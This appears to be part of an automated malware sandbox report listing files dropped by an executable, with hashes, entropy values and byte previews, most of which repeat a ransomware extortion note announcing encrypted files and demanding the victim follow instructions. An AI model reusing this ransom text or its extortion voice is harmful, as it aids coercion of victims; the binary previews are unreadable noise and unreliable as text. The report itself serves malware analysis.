                            Preview:...... ...T..*.Oez...{.*..M.H....$.....9....Z.&z.s^J....TD..nf....I.n[>@..I...zHy.}.....yg7(qQ........|.c...#.....&.1F..[.......m.RM..)...b`U.C7....iPK....%...xg..&.~.:(.KI..by...-.4..p......P~[!5...L.l.Q.~e.8.......oMj...c.^K....H...B.V...k.@.-`.Y..5..L.K.....:1.o`.S=7Qp.K.`..u.GEdZ21..*..+.8jN{.......X.R.Q.$.......oL$>.a.)s....D....M..O.*W......\.U..C.4..vvK.'|k....rr..BFam.S.;7J...BY.....C.5{.W.2rF.<...L.5.;.G./...Nf+...R.5..X?.j..............F./....../p.6..;0.F.....rRb@tU.s......6rZ=...n...3.h...S..}`...DO...!..v^..`J8..7*.c.....I*..53.....s.V.....4.P..9X.$Z..:.+W....*pD.K.*...>....Ytq\j...!.9.+......p..V......7....y....W..1N%h...i..,..g..r....!.3......'..u!. qaQ...)...^..3=...-.X\.s/.A...=....+...= .q.!)</......uw.M...~}[....%.n6.(...?N.e..R...Y....Iw...3.....Q...P..\hR.r.g.d..H....M...ez".Y%.4..OS..W..ab-.H,@..UI..#....6.........CW..b&{..[K..H.RG.5+A.'ld......d...:.Y.HV.r..4..c..'^&.+(..q....G.6-p....wV......(.........j(..j...U..-Y.-Z..rlB.l-nt
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1223
                            Entropy (8bit):7.831512998457542
                            Encrypted:false
                            SSDEEP:24:csVKtB3xzvw8P+0sa5vIMeP1Jp66jrfDOznJXfPEjSAlGiQacmTsSH:cGGvw8GGvJQ1Jp3DgyGAlhQ6b
                            MD5:4261346EEA7FFE5FA67C73CE9BB682E5
                            SHA1:5A7F61B7DBD9D83B9FCA7FB7887937737B8700D0
                            SHA-256:F043F92589EAD3AEA34B5897D4ED100A74C5AEDB29A99EFAC3F30E34D56B949E
                            SHA-512:7DF86547A6AD1663157BE965E0B0F8CA3950056222E0BAA8A98D516B6B37BCD3200817C5453A49AF7791F761A02B9349043C12CDB76E0B7D461C1D51DFC5B91E
                            Malicious:false
                            Preview:6.aiF...B ..^}HB.\.....+. ..d...3.&..%S.d.7.....q7.."0.db.p.Vm+.....y94D..$uDO...G."...^.....x..e..c.+...;LF6...u(...Cu...........Y....f.{.f.k..........X..V...L[.V.u.).1.@=5...wzR...........U./'.0d..".....k*p.Q....Kv....0...V..........`.F`...Fl.rn.{..\.....9~$..iDb.........[......6qom9.~....!Z..5.$.....*5.N.@.~.i.y...z..<....B.}Z,...(X...l....K$%.....f....*...j...2..RL..E.6.L.Z..%..e.%.6DD...f.o.).....Y...K..Ra8sX,....:..y....?.....ZDq..,...4..E#M.uE;...u.....>....-.....S.U.....l.d..,...?.g.F..+.x.z..nR..Y....4.U.})............C.\)V....?.^7......O]l3#+.....A.u.7.q.........c..."......%|*....). Pb..P..V....y9c.w.[a..:.S..-wX.kx\.T....?...k_....3..i..L..tK..X..i.@.t.O..T7.!.."Fq..2./.t1...*...:....x.^..*I$..fJ...qOS;.b .OI..S..._......X...?....U@..F...YY......<7.3...{.....Z..J...4.rZ3....H.d.iQ....."..>..~.k.U..ltd{p.c.x..U...ZwlD.8.e.W.D..n...,..Yn..%t..;.-......Q..V#.:'c.....=.\..JF...5.....d..&.o$..Q..R*(..b..Jq...1.Y..8.GzEl....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
